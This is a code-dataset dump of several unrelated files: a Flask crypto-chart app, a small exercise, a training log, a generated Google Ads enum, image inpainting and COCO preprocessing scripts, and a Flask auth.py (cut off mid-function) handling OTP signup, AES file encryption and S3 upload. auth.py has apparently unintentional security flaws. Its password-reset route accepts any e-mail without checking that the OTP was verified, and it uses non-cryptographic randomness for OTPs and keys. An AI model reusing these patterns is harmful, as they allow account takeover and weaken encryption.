blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2 values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 213 values | src_encoding stringclasses 30 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 2 10.3M | extension stringclasses 246 values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
5cde2b1e9bb942616c7e07c2025138877b9f3999 | f890e1e9a0203c4d17d046467f0e3ba5da63ab11 | /app.py | 9cc0816e5c9ecd06be620bcad205c85f69500cbb | [] | no_license | alexlouf/IPSSI-API-FLASK | db74f623108e5c7a369609e5670a7125a62e49c2 | 70b4e7233a16930fe5e62ec84bc5d03dc6b3db1f | refs/heads/main | 2023-01-01T00:00:47.043710 | 2020-10-23T10:20:36 | 2020-10-23T10:20:36 | 305,372,128 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,286 | py | import json
import urllib
from flask import Flask, request
from flask import render_template
app = Flask(__name__)
@app.route("/")
def info():
    """Landing page: plot daily crypto exchange volume from the Nomics demo API."""
    # NOTE(review): the file does `import urllib`; `urllib.request` is only
    # usable if the submodule was imported elsewhere -- confirm the import
    # line should be `import urllib.request`.
    url = "https://api.nomics.com/v1/volume/history?key=demo-26240835858194712a4f8cc0dc635c7a"
    result = urllib.request.urlopen(url)
    data = json.load(result)
    timestamp = []
    volume = []
    legend = "Volume d'échange quotidien ($)"
    # Split the API records into parallel label/value lists for the chart.
    for i in data:
        timestamp.append(i['timestamp'])
        volume.append(i['volume'])
    return render_template("index.html", labels=timestamp, values=volume, legend=legend)
@app.route("/prix")
def prix():
    """Plot the historical price of a coin.

    Query parameters (all optional): coin (default "BTC"),
    start / end dates as YYYY-MM-DD.
    """
    coin = request.args.get("coin")
    if coin is None:
        coin = "BTC"
    start = request.args.get("start")
    if start is None:
        start = "2011-08-18"
    end = request.args.get("end")
    if end is None:
        end = "2020-12-30"
    # BUG FIX: the query string previously contained "¤cy=" -- the literal
    # "&curren" had been mangled into the HTML entity "¤".  The Nomics API
    # parameter is "currency", so the coin filter was silently ignored.
    url = ("https://api.nomics.com/v1/exchange-rates/history"
           "?key=demo-26240835858194712a4f8cc0dc635c7a"
           "&currency=" + coin +
           "&start=" + start + "T00%3A00%3A00Z" +
           "&end=" + end + "T00%3A00%3A00Z")
    result = urllib.request.urlopen(url)
    data = json.load(result)
    timestamp = []
    price = []
    legend = coin + " Price"
    for i in data:
        timestamp.append(i['timestamp'])
        price.append(i['rate'])
    return render_template("price.html", labels=timestamp, values=price, legend=legend, coin=coin)
@app.route("/market")
def market():
    """Plot total crypto market capitalisation over time (Nomics demo key)."""
    url = "https://api.nomics.com/v1/market-cap/history?key=demo-26240835858194712a4f8cc0dc635c7a&start=2011-08-18T00%3A00%3A00Z"
    result = urllib.request.urlopen(url)
    data = json.load(result)
    marketcap = []
    timestamp = []
    legend = "Market CAP"
    # Parallel label/value lists for the chart template.
    for i in data:
        marketcap.append(i['market_cap'])
        timestamp.append(i['timestamp'])
    return render_template("market.html", labels=timestamp, values=marketcap, legend=legend)
@app.route("/exchange")
def exchange():
    """List BTC markets, optionally filtered by the 'echange' query parameter."""
    echange = request.args.get("echange")
    if echange is None:
        echange = "";
    url = "https://api.nomics.com/v1/markets?key=demo-26240835858194712a4f8cc0dc635c7a&exchange="+echange+"&base=BTC"
    result = urllib.request.urlopen(url)
    data = json.load(result)
    return render_template("exchange.html", data=data)
# Run the Flask development server when executed directly.
if __name__ == "__main__":
    app.run(debug=True)
| [
"contact@alexandrelouf.fr"
] | contact@alexandrelouf.fr |
e616bcfb1bf7461887e03e4ec1d91903201621bc | 830acb926cc5cf5a12f2045c8497d6f4aa1c2ef2 | /Tic-Tac-Toe/Problems/Running average/task.py | 6b4d0d43c548fa9085564c710c504a5801f51195 | [] | no_license | BuyankinM/JetBrainsAcademyProjects | ca2223875ea4aab3ee7fceedc8e293bdb6e1fdcf | d5f9fcde4298af714960b2755f762141de796694 | refs/heads/main | 2023-02-26T05:47:26.070972 | 2021-02-03T22:10:53 | 2021-02-03T22:10:53 | 335,762,702 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 111 | py | numbers = [int(d) for d in input()]
print([(numbers[i] + numbers[i + 1]) / 2 for i in range(len(numbers) - 1)]) | [
"mbuyankin@gmail.com"
] | mbuyankin@gmail.com |
60bbf34672b90fdcc90a1fafedf288d3d913dd8d | 1b19ff0604d07272299f29fff4cf9b7a84633f60 | /experiments/tuning_nogpu/20units_2.py | 1f2a5d6117430b6b8c8da8fea835d87e9d8482d3 | [
"MIT"
] | permissive | samuilstoychev/research_project | 23cde9147f66b5455c86ed7b5838b264cd457d87 | 897bde82471ef92ded396aa31d91ec19826d4ce2 | refs/heads/main | 2023-05-31T01:56:23.577771 | 2021-06-03T11:15:02 | 2021-06-03T11:15:02 | 343,269,034 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,149 | py | RAM AT BEGINNING: 0.22320556640625
Latent replay turned on
CUDA is NOT(!!) used
RAM BEFORE LOADING DATA: 0.2279052734375
Preparing the data...
SPLIT RATIO: [50000, 10000]
--> mnist: 'train'-dataset consisting of 60000 samples
--> mnist: 'test'-dataset consisting of 10000 samples
RAM AFTER LOADING DATA: 0.28905487060546875
RAM BEFORE CLASSIFER: 0.28993988037109375
RAM AFTER CLASSIFER: 0.28993988037109375
RAM BEFORE PRE-TRAINING 0.28993988037109375
RAM AFTER PRE-TRAINING 0.31342315673828125
RAM BEFORE GENERATOR: 0.31342315673828125
RAM AFTER DECLARING GENERATOR: 0.31342315673828125
MACs of root classifier 368800
MACs of top classifier: 3840
RAM BEFORE REPORTING: 0.31342315673828125
Parameter-stamp...
--> task: splitMNIST5-task
--> model: CNN_CLASSIFIER_c10
--> hyper-params: i500-lr0.001-b128-adam
--> replay: generative-VAE(MLP([20, 20, 20])--z100-c10)
splitMNIST5-task--CNN_CLASSIFIER_c10--i500-lr0.001-b128-adam--generative-VAE(MLP([20, 20, 20])--z100-c10)-s21857
----------------------------------------TOP----------------------------------------
CNNTopClassifier(
(dropout2): Dropout(p=0.5, inplace=False)
(fc1): Linear(in_features=20, out_features=128, bias=True)
(fc2): Linear(in_features=128, out_features=10, bias=True)
)
------------------------------------------------------------------------------------------
--> this network has 3978 parameters (~0.0 million)
of which: - learnable: 3978 (~0.0 million)
- fixed: 0 (~0.0 million)
------------------------------------------------------------------------------------------
----------------------------------------ROOT----------------------------------------
CNNRootClassifier(
(conv1): Conv2d(1, 10, kernel_size=(5, 5), stride=(1, 1))
(conv2): Conv2d(10, 10, kernel_size=(5, 5), stride=(1, 1))
(dropout1): Dropout(p=0.25, inplace=False)
(fc0): Linear(in_features=1440, out_features=20, bias=True)
)
------------------------------------------------------------------------------------------
--> this network has 31590 parameters (~0.0 million)
of which: - learnable: 31590 (~0.0 million)
- fixed: 0 (~0.0 million)
------------------------------------------------------------------------------------------
----------------------------------------GENERATOR----------------------------------------
AutoEncoderLatent(
(fcE): MLP(
(fcLayer1): fc_layer(
(linear): LinearExcitability(in_features=20, out_features=20)
(nl): ReLU()
)
(fcLayer2): fc_layer(
(linear): LinearExcitability(in_features=20, out_features=20)
(nl): ReLU()
)
)
(toZ): fc_layer_split(
(mean): fc_layer(
(linear): LinearExcitability(in_features=20, out_features=100)
)
(logvar): fc_layer(
(linear): LinearExcitability(in_features=20, out_features=100)
)
)
(classifier): fc_layer(
(linear): LinearExcitability(in_features=20, out_features=10)
)
(fromZ): fc_layer(
(linear): LinearExcitability(in_features=100, out_features=20)
(nl): ReLU()
)
(fcD): MLP(
(fcLayer1): fc_layer(
(linear): LinearExcitability(in_features=20, out_features=20)
(nl): ReLU()
)
(fcLayer2): fc_layer(
(linear): LinearExcitability(in_features=20, out_features=20)
(nl): Sigmoid()
)
)
)
------------------------------------------------------------------------------------------
--> this network has 8010 parameters (~0.0 million)
of which: - learnable: 8010 (~0.0 million)
- fixed: 0 (~0.0 million)
------------------------------------------------------------------------------------------
RAM BEFORE TRAINING: 0.31342315673828125
CPU BEFORE TRAINING: (132.48, 3.16)
Training...
PEAK TRAINING RAM: 0.341400146484375
RAM BEFORE EVALUATION: 0.34079742431640625
CPU BEFORE EVALUATION: (860.51, 15.38)
EVALUATION RESULTS:
Precision on test-set:
- Task 1: 0.9642
- Task 2: 0.9967
- Task 3: 0.9840
- Task 4: 0.9879
- Task 5: 0.9918
=> Average precision over all 5 tasks: 0.9849
=> Total training time = 138.8 seconds
RAM AT THE END: 0.33341217041015625
CPU AT THE END: (865.33, 16.44)
| [
"ss2719@cl.cam.ac.uk"
] | ss2719@cl.cam.ac.uk |
8a50cede02f24b38149931891726dd61209e7e8b | eb9c3dac0dca0ecd184df14b1fda62e61cc8c7d7 | /google/ads/googleads/v6/googleads-py/google/ads/googleads/v6/enums/types/user_list_size_range.py | 0d0e350bd2d3aad1366ab619a5163fc0ab0236ea | [
"Apache-2.0"
] | permissive | Tryweirder/googleapis-gen | 2e5daf46574c3af3d448f1177eaebe809100c346 | 45d8e9377379f9d1d4e166e80415a8c1737f284d | refs/heads/master | 2023-04-05T06:30:04.726589 | 2021-04-13T23:35:20 | 2021-04-13T23:35:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,816 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package='google.ads.googleads.v6.enums',
marshal='google.ads.googleads.v6',
manifest={
'UserListSizeRangeEnum',
},
)
# Auto-generated protobuf wrapper for the Google Ads v6 UserListSizeRange
# enum; regenerate from the .proto rather than editing by hand.
class UserListSizeRangeEnum(proto.Message):
    r"""Size range in terms of number of users of a UserList."""
    class UserListSizeRange(proto.Enum):
        r"""Enum containing possible user list size ranges.

        Values 2+ are half-open user-count buckets ordered from smallest
        to largest; 0/1 are the standard proto unspecified/unknown slots.
        """
        UNSPECIFIED = 0
        UNKNOWN = 1
        LESS_THAN_FIVE_HUNDRED = 2
        LESS_THAN_ONE_THOUSAND = 3
        ONE_THOUSAND_TO_TEN_THOUSAND = 4
        TEN_THOUSAND_TO_FIFTY_THOUSAND = 5
        FIFTY_THOUSAND_TO_ONE_HUNDRED_THOUSAND = 6
        ONE_HUNDRED_THOUSAND_TO_THREE_HUNDRED_THOUSAND = 7
        THREE_HUNDRED_THOUSAND_TO_FIVE_HUNDRED_THOUSAND = 8
        FIVE_HUNDRED_THOUSAND_TO_ONE_MILLION = 9
        ONE_MILLION_TO_TWO_MILLION = 10
        TWO_MILLION_TO_THREE_MILLION = 11
        THREE_MILLION_TO_FIVE_MILLION = 12
        FIVE_MILLION_TO_TEN_MILLION = 13
        TEN_MILLION_TO_TWENTY_MILLION = 14
        TWENTY_MILLION_TO_THIRTY_MILLION = 15
        THIRTY_MILLION_TO_FIFTY_MILLION = 16
        OVER_FIFTY_MILLION = 17
__all__ = tuple(sorted(__protobuf__.manifest))
| [
"bazel-bot-development[bot]@users.noreply.github.com"
] | bazel-bot-development[bot]@users.noreply.github.com |
9c802b12bacaad5288ed0d1093da3038b12fd657 | b2755ce7a643ae5c55c4b0c8689d09ad51819e6b | /anuvaad-etl/anuvaad-extractor/document-processor/ocr/diagram/src/services/inpaint.py | c2b1df5cef5d8dcf9849cccd0660a88ebc93b2c7 | [
"MIT"
] | permissive | project-anuvaad/anuvaad | 96df31170b27467d296cee43440b6dade7b1247c | 2bfcf6b9779bf1abd41e1bc42c27007127ddbefb | refs/heads/master | 2023-08-17T01:18:25.587918 | 2023-08-14T09:53:16 | 2023-08-14T09:53:16 | 265,545,286 | 41 | 39 | MIT | 2023-09-14T05:58:27 | 2020-05-20T11:34:37 | Jupyter Notebook | UTF-8 | Python | false | false | 1,496 | py | import numpy as np
import cv2
def get_words(response, page_index):
    """Flatten one page of an OCR response into a list of word regions.

    The first region of the page is skipped (same slice as before); the
    remaining paragraph -> line -> word hierarchy is flattened in order.
    """
    page = response['outputs'][0]['pages'][page_index]
    return [
        word
        for paragraph in page['regions'][1:]
        for line in paragraph['regions']
        for word in line['regions']
    ]
def get_border_color(image, box):
    """Median per-channel colour of the pixels along the box's border.

    `box['boundingBox']['vertices']` holds four {'x','y'} corners in
    top-left, top-right, bottom-right, bottom-left order.  Returns a
    (c0, c1, c2) tuple of channel medians.
    """
    v = box['boundingBox']['vertices']
    top = image[v[0]['y'], v[0]['x']:v[1]['x']]
    right = image[v[1]['y']:v[2]['y'], v[1]['x']]
    bottom = image[v[2]['y'], v[3]['x']:v[2]['x']]
    left = image[v[0]['y']:v[3]['y'], v[3]['x']]
    border = np.concatenate([top, right, bottom, left])
    return tuple(np.median(border[:, c]) for c in range(3))
def inpaint_image(image, box, color, margin=2):
    """Overwrite the box region of `image` (in place) with a solid colour.

    Args:
        image: HxWxC ndarray; modified in place and also returned.
        box: word dict whose box['boundingBox']['vertices'] are four
            {'x','y'} corners (top-left, top-right, bottom-right,
            bottom-left).
        color: per-channel fill value, broadcast over the region.
        margin: extra rows above/below the box; twice as many extra
            columns on the left/right.

    Returns:
        The same `image` array, for chaining.
    """
    points = box['boundingBox']['vertices']
    # BUG FIX: when the box sat within `margin` pixels of the top/left
    # edge, the slice start went negative and wrapped around, painting a
    # strip near the opposite edge instead of the intended region.
    # Clamp starts to 0.
    y0 = max(points[0]['y'] - margin, 0)
    y1 = points[3]['y'] + margin
    x0 = max(points[0]['x'] - margin * 2, 0)
    x1 = points[1]['x'] + margin * 2
    image[y0:y1, x0:x1, :] = color
    return image
def heal_image(image_path,boxes,fill=None):
    """Erase OCR'd words from an image by painting over their boxes.

    Each box is filled with `fill` (a BGR triple) when given; otherwise
    with the median colour of the box's own border, so the patch blends
    with the surrounding background.  Returns the modified ndarray.
    """
    image = cv2.imread(image_path)
    for box in boxes:
        if fill is None:
            border_color = get_border_color(image,box)
            image = inpaint_image(image,box,np.array(border_color))
        else:
            image = inpaint_image(image,box,np.array(fill))
    return image
| [
"srihari.nagaraj@tarento.com"
] | srihari.nagaraj@tarento.com |
a908ac1ce5a8bccbbde05156d911b1af85c292e5 | f4eb8eda733e66c7342c93056bb1d6c8da12549c | /Preproc/PreProcDefs/mscoco.py | e8f52da086a9a4ae5618e407f6ddb8d4f0b64a27 | [
"BSD-3-Clause"
] | permissive | clp-research/image_wac | 016ec257edc9e10bce119d12afa45803b4f38dc9 | b3ce45ba951f0d78777bf984fd3748b09bb2ad24 | refs/heads/master | 2021-06-02T22:44:00.133885 | 2016-09-28T08:11:51 | 2016-09-28T08:11:51 | 60,342,270 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,027 | py | ## MSCOCO
now = datetime.datetime.now().strftime('%Y-%m-%d-%H:%M')
print '... (MSCOCO)'
print now
with open('PreProcOut/refcoco_splits.json', 'r') as f:
refcoco_splits = json.load(f)
with open('PreProcOut/google_refexp_rexsplits.json', 'r') as f:
grex_splits = json.load(f)
all_coco_files = list(set(chain(*refcoco_splits.values())).union(set(chain(*grex_splits))))
coco_in_train_p = '../Data/Images/MSCOCO/annotations/instances_train2014.json'
with open(coco_in_train_p, 'r') as f:
coco_in = json.load(f)
cocoandf = pd.DataFrame(coco_in['annotations'])
file_df = pd.DataFrame(all_coco_files, columns=['image_id'])
cocoandf_reduced = pd.merge(cocoandf, file_df)
bbdf_coco = cocoandf_reduced[['image_id', 'id', 'bbox', 'category_id']]
bbdf_coco['i_corpus'] = icorpus_code['mscoco']
bbdf_coco.columns = 'image_id region_id bb cat i_corpus'.split()
bbdf_coco = bbdf_coco['i_corpus image_id region_id bb cat'.split()]
with gzip.open('PreProcOut/mscoco_bbdf.pklz', 'w') as f:
pickle.dump(bbdf_coco, f)
| [
"david.schlangen@uni-bielefeld.de"
] | david.schlangen@uni-bielefeld.de |
6f6c3633acc4941bbe891bccd8fe4dd6d7209c32 | 586c1a106e655a9e448238f6ee8cd061316c136b | /auth.py | 1d40671d2456911f5a5e03a53137a9da350e8ae0 | [] | no_license | tanvipenumudy/Secure-AWS-Storage | 049c9c115ca1b83d4c3c9b39bc7064df04a8b5fa | 173fb38a6450d42850c294f843f9af597f0945e1 | refs/heads/main | 2023-01-24T12:28:45.684299 | 2020-11-22T18:33:43 | 2020-11-22T18:33:43 | 315,098,808 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,786 | py | from werkzeug.security import generate_password_hash, check_password_hash
from flask import Blueprint, render_template, redirect, url_for, request, flash, send_file, Response
from flask_mail import Mail, Message
from app import db
from flask_login import login_user
from models import User
from flask_login import login_user, logout_user, login_required, current_user
from flask import Markup
from Crypto import Random
from Crypto.Cipher import AES
from werkzeug.utils import secure_filename
import os
import random
import string
import os.path
import hashlib
import smtplib
import datetime
from resources import get_bucket, get_buckets_list
from app import app
auth = Blueprint('auth', __name__)
app_root = os.path.dirname(os.path.abspath(__file__))
app.config["MAIL_SERVER"]='smtp.gmail.com'
app.config["MAIL_PORT"] = 465
app.config["MAIL_USERNAME"] = 'e-mail'
app.config['MAIL_PASSWORD'] = 'password'
app.config['MAIL_USE_TLS'] = False
app.config['MAIL_USE_SSL'] = True
mail = Mail(app)
def pad(s):
    """Zero-pad bytes `s` to a multiple of the AES block size.

    Always appends at least one NUL byte (a full extra block when len(s)
    is already aligned).
    """
    return s + b"\0" * (AES.block_size - len(s) % AES.block_size)
def encrypt(message, key, key_size=256):
    """AES-CBC encrypt `message` bytes; returns iv + ciphertext."""
    message = pad(message)
    # Fresh random IV per message, prepended to the ciphertext.
    iv = Random.new().read(AES.block_size)
    cipher = AES.new(key, AES.MODE_CBC, iv)
    return iv + cipher.encrypt(message)
def decrypt(ciphertext, key):
    """Inverse of encrypt(): split off the IV, decrypt, strip padding.

    NOTE(review): stripping trailing NUL (0x00) bytes also removes NULs
    that were part of the original plaintext, so binary payloads ending
    in 0x00 are truncated.  PKCS#7 padding would be unambiguous.
    """
    iv = ciphertext[:AES.block_size]
    cipher = AES.new(key, AES.MODE_CBC, iv)
    plaintext = cipher.decrypt(ciphertext[AES.block_size:])
    return plaintext.rstrip(b"\0")
def encrypt_file(file_name, key):
    """Encrypt a file on disk, writing `<file_name>.enc` alongside it."""
    with open(file_name, 'rb') as fo:
        plaintext = fo.read()
    enc = encrypt(plaintext, key)
    with open(file_name + ".enc", 'wb') as fo:
        fo.write(enc)
def decrypt_file(file_name, key):
    """Decrypt `<name>.enc`, writing the plaintext to `<name>`.

    Assumes `file_name` ends in a 4-character suffix (".enc"): the
    output path is file_name[:-4].
    """
    with open(file_name, 'rb') as fo:
        ciphertext = fo.read()
    dec = decrypt(ciphertext, key)
    with open(file_name[:-4], 'wb') as fo:
        fo.write(dec)
@auth.route('/login')
def login():
    """Render the login form."""
    return render_template('login.html')
@auth.route('/signup')
def signup():
    """Render the signup form."""
    return render_template('signup.html')
@auth.route('/logout')
@login_required
def logout():
    """Log the current user out and return to the landing page."""
    logout_user()
    return redirect(url_for('index'))
@auth.route('/signup',methods=['POST'])
def signup_post():
    """Handle the signup form: create an unverified user and e-mail an OTP."""
    email = request.form.get('email')
    name = request.form.get('name')
    password = request.form.get('password')
    if(email == '' or name == '' or password == ''):
        flash('Please enter all the fields.')
        return redirect(url_for('auth.signup'))
    user = User.query.filter_by(email=email).first()
    if(user):
        flash(Markup('Email address already exists. Please go to <a href="http://127.0.0.1:5000/login" class="alert-link">Login Page</a>'))
        return redirect(url_for('auth.signup'))
    # Six-digit one-time password.  NOTE(review): random.randint is not a
    # CSPRNG -- the `secrets` module would be preferable for OTPs.
    otp = random.randint(100000,999999)
    # NOTE(review): sender 'e-mail' looks like a placeholder (cf. the real
    # address used in generate()) -- confirm before deploying.
    msg = Message('OTP Verification for Secure Cloud Storage Signup', sender = 'e-mail', recipients = [email])
    msg.body = 'Your OTP for Signup Verification of Secure Cloud Storage Flask App - CNS Project (Valid for 5 mins) is: '+str(otp)+'\nPlease do not share with anyone!'
    mail.send(msg)
    # registered_on doubles as the OTP issue time (5-minute validity window).
    registered_on = datetime.datetime.now()
    new_user = User(email=email, name=name, otp=otp, registered_on=registered_on, password=generate_password_hash(password, method='sha256'),keydir="{}")
    # add the new user to the database
    db.session.add(new_user)
    db.session.commit()
    return redirect(url_for('auth.validate', email=email))
# The four handlers below implement OTP verification and re-sending.
# validate/generate serve the signup flow; validate1/generate1 are
# near-duplicates serving the password-reset flow (they differ only in
# their success/redirect targets).  Consider factoring out the shared logic.
@auth.route('/validate/<email>',methods=["GET","POST"])
def validate(email):
    """Signup OTP check: GET shows the form, POST verifies the code."""
    if(request.method == 'GET'):
        return render_template('validate.html', email=email)
    else:
        from app import current_user
        user = User.query.filter_by(email=email).first()
        otp = user.otp
        user_otp = request.form['otpcode']
        if(user_otp == ''):
            flash('OTP field is left blank.')
            return redirect(url_for('auth.validate', email=email))
        if(str(otp) == user_otp):
            # OTPs are valid for five minutes from registered_on.
            c = datetime.datetime.now() - user.registered_on
            if((c.total_seconds()/60) > 5):
                flash('Your OTP has expired!')
                return redirect(url_for('auth.validate', email=email))
            else:
                user.verified = True
                db.session.commit()
                flash('Congrats! Your account has been Verified!')
                return redirect(url_for('auth.login'))
        flash('Please Enter the Correct OTP!')
        return redirect(url_for('auth.validate', email=email))
@auth.route('/generate/<email>')
def generate(email):
    """Re-send a fresh signup OTP and reset its validity window."""
    user = User.query.filter_by(email=email).first()
    otp = random.randint(100000,999999)
    msg = Message('OTP Verification for Secure Cloud Storage Signup', sender = 'tanvi6145@gmail.com', recipients = [email])
    msg.body = 'Your OTP for Signup Verification of Secure Cloud Storage Flask App - CNS Project (Valid for 5 mins) is: '+str(otp)+'\nPlease do not share with anyone!'
    mail.send(msg)
    user.otp = otp
    user.registered_on = datetime.datetime.now()
    db.session.commit()
    flash('OTP has been resent')
    return redirect(url_for('auth.validate', email=email))
@auth.route('/validate1/<email>',methods=["GET","POST"])
def validate1(email):
    """Password-reset OTP check; on success continues to auth.pasw."""
    if(request.method == 'GET'):
        return render_template('validate1.html', email=email)
    else:
        from app import current_user
        user = User.query.filter_by(email=email).first()
        otp = user.otp
        user_otp = request.form['otpcode']
        if(user_otp == ''):
            flash('OTP field is left blank.')
            return redirect(url_for('auth.validate1', email=email))
        if(str(otp) == user_otp):
            # Same five-minute validity window as the signup flow.
            c = datetime.datetime.now() - user.registered_on
            if((c.total_seconds()/60) > 5):
                flash('Your OTP has expired!')
                return redirect(url_for('auth.validate1', email=email))
            else:
                user.verified = True
                db.session.commit()
                flash('Congrats! Your account has been Verified!')
                return redirect(url_for('auth.pasw', email=email))
        flash('Please Enter the Correct OTP!')
        return redirect(url_for('auth.validate1', email=email))
@auth.route('/generate1/<email>')
def generate1(email):
    """Re-send a fresh password-reset OTP."""
    user = User.query.filter_by(email=email).first()
    otp = random.randint(100000,999999)
    msg = Message('OTP Verification for Secure Cloud Storage Signup', sender = 'tanvi6145@gmail.com', recipients = [email])
    msg.body = 'Your OTP for Signup Verification of Secure Cloud Storage Flask App - CNS Project (Valid for 5 mins) is: '+str(otp)+'\nPlease do not share with anyone!'
    mail.send(msg)
    user.otp = otp
    user.registered_on = datetime.datetime.now()
    db.session.commit()
    flash('OTP has been resent')
    return redirect(url_for('auth.validate1', email=email))
@auth.route('/login', methods=['POST'])
def login_post():
    """Check credentials; block login until the e-mail has been verified."""
    email = request.form.get('email')
    password = request.form.get('password')
    remember = True if request.form.get('remember') else False
    user = User.query.filter_by(email=email).first()
    if not user or not check_password_hash(user.password, password):
        flash('Please check your login details and try again!')
        return redirect(url_for('auth.login'))
    if(user.verified!= True):
        flash('Please Verify your Email!')
        return redirect(url_for('auth.validate', email=email))
    login_user(user, remember=remember)
    return redirect(url_for('profile'))
@auth.route('/mail1', methods=["GET","POST"])
def mail1():
    """Password-reset entry point: ask for an e-mail and send an OTP."""
    if(request.method == 'GET'):
        return render_template('mail1.html')
    else:
        email = request.form.get('email')
        if(email == ''):
            flash('Email field is left blank.')
            return redirect(url_for('auth.mail1'))
        # NOTE(review): no existence check -- a POST with an unknown e-mail
        # leaves `user` as None and the attribute writes below raise.
        user = User.query.filter_by(email=email).first()
        otp = random.randint(100000,999999)
        msg = Message('OTP Verification for Secure Cloud Storage Signup', sender = 'tanvi6145@gmail.com', recipients = [email])
        msg.body = 'Your OTP for Signup Verification of Secure Cloud Storage Flask App - CNS Project (Valid for 5 mins) is: '+str(otp)+'\nPlease do not share with anyone!'
        mail.send(msg)
        user.otp = otp
        user.registered_on = datetime.datetime.now()
        db.session.commit()
        flash('OTP has been sent')
        return redirect(url_for('auth.validate1', email=email))
@auth.route('/pasw/<email>', methods=["GET", "POST"])
def pasw(email):
    """Password-reset form reached after e-mail/OTP verification.

    GET renders the form; POST validates the two password fields and
    stores a new sha256 hash for the user identified by `email`.
    """
    if(request.method == 'GET'):
        return render_template('pasw.html')
    else:
        new_psw = request.form.get('password')
        con_psw = request.form.get('confirmpass')
        # BUG FIX: validation failures previously redirected to 'auth.set2'
        # (the login-required settings page) instead of back to this reset
        # form, and the commit-error redirect omitted the required `email`
        # URL argument, which raises a werkzeug BuildError at runtime.
        if(new_psw == '' or con_psw == ''):
            flash('Password field is left blank.')
            return redirect(url_for('auth.pasw', email=email))
        if(new_psw != con_psw):
            flash('Passwords do not match')
            return redirect(url_for('auth.pasw', email=email))
        passhash = generate_password_hash(new_psw, method='sha256')
        user = User.query.filter_by(email=email).first()
        user.password = passhash
        try:
            db.session.commit()
        except Exception:
            flash('Technical error, failed to update')
            return redirect(url_for('auth.pasw', email=email))
        flash('Successfully Updated!')
        return redirect(url_for('auth.login'))
@auth.route('/dele')
@login_required
def dele():
    """Render the account-deletion confirmation page."""
    return render_template('dele.html')
@auth.route('/account_set')
@login_required
def account_set():
    """Render the account-settings landing page."""
    return render_template('settings.html')
@auth.route('/set1', methods=["GET", "POST"])
@login_required
def set1():
    """Settings page 1: let the logged-in user change their e-mail."""
    from app import current_user
    if(request.method == 'GET'):
        return render_template('setting1.html')
    else:
        new_email = request.form.get('email')
        if(new_email == ''):
            flash('Email field is left blank.')
            return redirect(url_for('auth.set1'))
        user = User.query.get_or_404(current_user.id)
        user.email = new_email
        try:
            db.session.commit()
        except:
            flash('Technical error, failed to update')
            return redirect(url_for('auth.set1'))
        flash('Successfully Updated!')
        return redirect(url_for('auth.set1'))
@auth.route('/set2', methods=["GET", "POST"])
@login_required
def set2():
    """Settings page 2: let the logged-in user change their password."""
    from app import current_user
    if(request.method == 'GET'):
        return render_template('setting2.html')
    else:
        new_psw = request.form.get('password')
        con_psw = request.form.get('confirmpass')
        if(new_psw == '' or con_psw == ''):
            flash('Password field is left blank.')
            return redirect(url_for('auth.set2'))
        if(new_psw != con_psw):
            flash('Passwords do not match')
            return redirect(url_for('auth.set2'))
        passhash = generate_password_hash(new_psw, method='sha256')
        user = User.query.get_or_404(current_user.id)
        user.password = passhash
        try:
            db.session.commit()
        except:
            flash('Technical error, failed to update')
            return redirect(url_for('auth.set2'))
        flash('Successfully Updated!')
        return redirect(url_for('auth.set2'))
@auth.route('/cancel account')
def cancel():
    """Delete the current user's account and send them to the login page.

    NOTE(review): unlike the other account routes this one has no
    @login_required guard; for an anonymous visitor `current_user` is the
    anonymous proxy (not None), so the delete below would fail -- confirm
    whether the guard was omitted intentionally.
    """
    from app import current_user
    if current_user is None:
        return redirect(url_for('index'))
    try:
        db.session.delete(current_user)
        db.session.commit()
    except:
        return 'unable to delete the user.'
    flash('Your account has been deleted')
    return redirect(url_for('auth.login'))
@auth.route('/enc_upload', methods=['POST'])
@login_required
def enc_upload():
    """Encrypt an uploaded file, push it to S3, and return the key file.

    Flow: save the upload under ./uploads, AES-CBC encrypt it with a key
    derived from a fresh random 20-character string (sha256 digest) into
    ./encrypted, upload the .enc object to the S3 bucket, record the key
    in the user's keydir mapping, and send the key string back to the
    user as a .txt download.
    """
    from app import current_user
    user = User.query.get_or_404(current_user.id)
    source = os.path.join(app_root,'uploads')
    if(not os.path.exists(source)):
        os.makedirs(source)
    target = os.path.join(app_root, 'encrypted')
    if(not os.path.exists(target)):
        os.makedirs(target)
    file = request.files['file']
    if(file.filename==''):
        flash('No file selected')
    if(file):
        loc0 = os.path.join(source,file.filename)
        file.save(loc0)
        loc = os.path.join(target,file.filename+".enc")
        with open(loc0, 'rb') as fo:
            plaintext = fo.read()
        # NOTE(review): random.choices is not cryptographically secure;
        # the `secrets` module should generate this key material.
        res = ''.join(random.choices(string.ascii_uppercase + string.digits, k = 20))
        res1 = bytes(res, 'utf-8')
        key = hashlib.sha256(res1).digest()
        enc = encrypt(plaintext, key)
        with open(loc, 'wb') as fo:
            fo.write(enc)
        my_bucket = get_bucket()
        my_bucket.Object(file.filename+".enc").put(Body=open(loc,'rb'))
        source1 = os.path.join(app_root, 'keys')
        if(not os.path.exists(source1)):
            os.makedirs(source1)
